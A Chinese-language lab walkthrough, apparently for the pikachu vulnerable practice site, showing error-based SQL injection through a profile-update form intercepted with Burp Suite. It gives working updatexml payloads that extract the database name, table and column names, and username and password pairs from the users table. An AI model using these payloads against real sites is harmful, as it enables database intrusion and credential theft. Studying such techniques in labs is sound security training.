第一步：访问目标站点，注册一个账号xiaosan：123456，并登录

第二步：点击修改个人信息，并用burpsuite工具拦截数据包，修改住址为123456

拦截数据包，右键发送到Repeater

第三步：测试注入点
正常请求页面

输入单引号测试注入点页面

第四步：经过测试发现不能使用联合查询注入，故改为报错注入获取当前网站所连接的数据库的名字
1’ or updatexml(1,concat(0x7e,database()),0) or’

第五步：获取当前网站所连接的数据库的版本号

第六步：获取当前WEB网站所连接的数据库pikachu中全部的表名信息
1’ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘pikachu’)),1) or ‘1

第七步：获取当前WEB网站所连接的数据库pikachu中表users中的全部列名信息
1’ or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘pikachu’ and table_name=‘users’)),1) or ‘1

第八步：获取当前WEB网站所连接的数据库pikachu中表users中username、password列的字段内容
1’ or updatexml(1,concat(0x7e,(select group_concat(username,’@’,password) from pikachu.users)),1) or '1